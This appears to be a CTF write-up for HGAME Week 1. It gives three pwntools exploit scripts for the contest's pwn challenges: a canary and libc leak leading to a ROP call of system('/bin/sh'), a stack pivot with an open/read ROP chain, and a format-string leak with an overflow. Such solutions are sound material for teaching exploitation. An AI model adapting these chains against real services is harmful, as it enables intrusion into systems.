HGAME Week1

这里只附上pwn的payload

counting petals

from pwn import *

io = remote("node1.hgame.vidar.club", 30732)  # contest endpoint; the connection is opened as soon as the script runs
#io = process("./vuln")  # local alternative, kept commented out
elf = ELF("./vuln")  # challenge binary, looked up relative to the current directory
libc = ELF("./libc.so.6")  # libc shipped with the challenge; every libc offset used below is tied to this exact build
context(os='linux', arch='amd64')  # fixes the word size/endianness used by p32/p64/u64
#context.log_level='debug'  # re-enable for verbose pwntools I/O logging

def debug():
    """Attach gdb to the process behind the module-level ``io`` tube."""
    target = io
    gdb.attach(target)

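def to_signed_64bit(n, *, bits=64):
    """Reinterpret the low ``bits`` bits of ``n`` as a two's-complement signed int.

    Args:
        n: Any int. Only its low ``bits`` bits are kept, so negative inputs and
           inputs wider than the word are masked first; the function is
           idempotent (applying it twice gives the same result).
        bits: Width of the word to interpret. Defaults to 64, which is the
           original fixed behaviour; keyword-only so existing callers are
           unaffected.

    Returns:
        The signed value in the range [-2**(bits-1), 2**(bits-1) - 1].
    """
    mask = (1 << bits) - 1
    n &= mask  # keep only the low `bits` bits
    if n >= 1 << (bits - 1):  # sign bit set -> wrap into the negative range
        n -= 1 << bits
    return n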

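def to_unsigned_64bit(n, *, bits=64):
    """Return the low ``bits`` bits of ``n`` as a non-negative int.

    Args:
        n: Any int; negative values are reduced to their two's-complement
           representation in ``bits`` bits.
        bits: Word width, default 64 (the original fixed behaviour). Keyword-only
           so existing single-argument callers keep working.

    Returns:
        An int in the range [0, 2**bits - 1].
    """
    return n & ((1 << bits) - 1)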


# Two rounds of interaction with the 'counting petals' service, using the
# module-level io/libc and the 64-bit conversion helpers above. The prompt
# strings, the '274877907008 + ' marker and the literal libc offsets below
# are all tied to the challenge's exact binary and libc.so.6 build; against
# any other build the recvuntil calls will hang or the parsed values will be
# silently wrong.
io.sendlineafter(b'\nHow many flowers have you prepared this time?', b'16')
for i in range(15):
    io.sendlineafter(b'the flower number', b'0')
# Inputs are sent as signed decimal text, so values are passed through
# to_signed_64bit before being encoded.
payload = str(to_signed_64bit(u64(p32(64) * 2))).encode()
io.sendlineafter(b'the flower number', payload)
#debug()
io.sendlineafter(b'Reply 1 indicates the former and 2 indicates the latter: ', b'0')
# The service echoes values as (possibly negative) decimals; they are
# normalised back to unsigned 64-bit before use.
io.recvuntil(b'274877907008 + ')
canary = to_unsigned_64bit(int(io.recvuntil(b'+', drop=True)))
print(f'canary:{hex(canary)}')
io.recvuntil(b'1 + ')
# The +0x30 adjustment relative to __libc_start_main is specific to this libc
# build (presumably measured under a debugger — not verified here).
libc_base = to_unsigned_64bit(int(io.recvuntil(b'+', drop=True))) - libc.sym["__libc_start_main"] + 0x30
print(f'libc:{hex(libc_base)}')
# Hard-coded libc-relative offsets for the shipped libc.so.6 only.
rdi = libc_base + 0x2a3e5
ret = libc_base + 0x2a3e6
io.sendlineafter(b'\nHow many flowers have you prepared this time?', b'16')
for i in range(15):
    io.sendlineafter(b'the flower number', b'0')
payload = str(to_signed_64bit(u64(p32(22) + p32(18)))).encode()
io.sendlineafter(b'the flower number', payload)
io.sendlineafter(b'the flower number', str(to_signed_64bit(ret)).encode())
io.sendlineafter(b'the flower number', str(to_signed_64bit(rdi)).encode())
io.sendlineafter(b'the flower number', str(to_signed_64bit(libc_base + next(libc.search(b"/bin/sh")))).encode())
io.sendlineafter(b'the flower number', str(to_signed_64bit(libc_base + libc.sym["system"])).encode())
io.sendlineafter(b'Reply 1 indicates the former and 2 indicates the latter: ', b'0')
io.interactive()

ezstack

from pwn import *

io = remote("node2.hgame.vidar.club", 31283)  # contest endpoint; the connection is opened as soon as the script runs
#io = process("./vuln")  # local alternative, kept commented out
elf = ELF("./vuln")  # challenge binary, looked up relative to the current directory
libc = ELF("./libc6_2.31-0ubuntu9.16_amd64.so")  # the specific libc build the hard-coded offsets below were taken from
context(os='linux', arch='amd64')  # fixes the word size/endianness used by p64/u64
#context.log_level='debug'  # re-enable for verbose pwntools I/O logging

def debug():
    """Attach gdb to the process behind the module-level ``io`` tube."""
    target = io
    gdb.attach(target)
# NOTE(review): libc_base is a literal captured from a single earlier run (the
# commented-out print below is where it was read); it is presumably
# randomised per run, so the script as written is not reproducible and only
# documents the values observed during the contest.
libc_base = 0x7f5b93859000
# The remaining constants are hard-coded for the challenge binary and the
# named libc6_2.31-0ubuntu9.16 build; they hold only for those exact files.
rdi = 0x401713
ret = rdi + 1
rsi_r15 = 0x401711  # assigned but not referenced anywhere below
read = 0x4013D9
rsi = 0x2601f + libc_base
rdx_rbx = 0x15fae6 + libc_base
bss = 0x404130 + 0x800
rax = 0x36174 + libc_base  # assigned but not referenced anywhere below
payload = b'a' * 0x50 + p64(bss + 0x70) + p64(read)
io.sendafter(b'Good luck.', payload)
payload = (p64(bss + 0x20) + p64(rdx_rbx) + p64(0x300) + p64(0) + p64(0x401420)).ljust(0x50, b'\x00') + p64(bss + 0x20) + p64(read)
io.sendafter(b'Good luck.', payload)
io.sendafter(b'Good luck.', b'1')
# Leak print left disabled by the author; the libc_base literal above
# appears to have been derived from its output.
#print(hex(u64(io.recvuntil(b'\x7f')[-6:].ljust(8, b'\x00')) - libc.sym['read']))
payload = b'flag\x00\x00\x00\x00' + b'a' * 0x50 + p64(rsi) + p64(bss - 0x30) + p64(ret) + p64(rdi) + p64(bss - 0x30) + p64(rsi) + p64(0) + p64(libc_base + libc.sym["open"]) + p64(rdi) + p64(5) + p64(rsi) + p64(bss - 0x30) + p64(rdx_rbx) + p64(0x300) + p64(0) + p64(libc_base + libc.sym['read']) + p64(rdi) + p64(4) + p64(elf.sym['print'])
io.send(payload)
io.interactive()

format

from pwn import *

io = remote("node1.hgame.vidar.club", 30123)  # contest endpoint; the connection is opened as soon as the script runs
#io = process("./vuln")  # local alternative, kept commented out
elf = ELF("./vuln")  # challenge binary, looked up relative to the current directory
libc = ELF("./libc.so.6")  # libc shipped with the challenge; the libc offsets used below are tied to this exact build
context(os='linux', arch='amd64')  # fixes the word size/endianness used by p32/p64
#context.log_level='debug'  # re-enable for verbose pwntools I/O logging

def debug():
    """Attach gdb to the process behind the module-level ``io`` tube."""
    target = io
    gdb.attach(target)

# Interaction with the 'format' service using the module-level io/libc. The
# prompt strings, the '%p'-style probes, the stack adjustment (0x211c + 0x14),
# the literal binary addresses (0x4012CF, 0x4010D4) and the libc offsets are
# all specific to this challenge's binary and libc.so.6; none of them transfer
# to another build.
io.sendlineafter(b'you have n chance to getshell\n n = ', b'1')
io.sendlineafter(b'type something:', b'%p@')
io.recvuntil(b'you type: ')
# The echoed pointer is parsed as hex and offset by a constant measured for
# this binary (presumably under a debugger — not verified here).
stack = int(io.recvuntil(b'@', drop=True), 16) + 0x211c + 0x14
print(f'stack:{hex(stack)}')
io.sendlineafter(b'you have n space to getshell(n<5)\n n = ', b'-1000000')
payload = b'a' * 5 + p64(stack) + p64(0x4012CF) + b'@@%29$p@' + p32(0) + p32(0) +p64(0) + p64(0x4010D4)
#debug()
io.send(payload)
io.recvuntil(b'@@')
# The -128 adjustment relative to __libc_start_main is specific to this libc build.
libc_base = int(io.recvuntil(b'@', drop=True), 16) - libc.sym["__libc_start_main"] - 128
print(f'libc:{hex(libc_base)}')
# Hard-coded libc-relative offsets for the shipped libc.so.6 only.
rdi = 0x2a3e5 + libc_base
ret = 0x2a3e6 + libc_base
io.sendlineafter(b'you have n chance to getshell\n n = ', b'0')
io.sendlineafter(b'you have n space to getshell(n<5)\n n = ', b'-1000000')
payload = b'a' * 13 + p64(ret) + p64(rdi) + p64(next(libc.search(b'/bin/sh')) + libc_base) + p64(libc_base + libc.sym["system"])
io.send(payload)
io.interactive()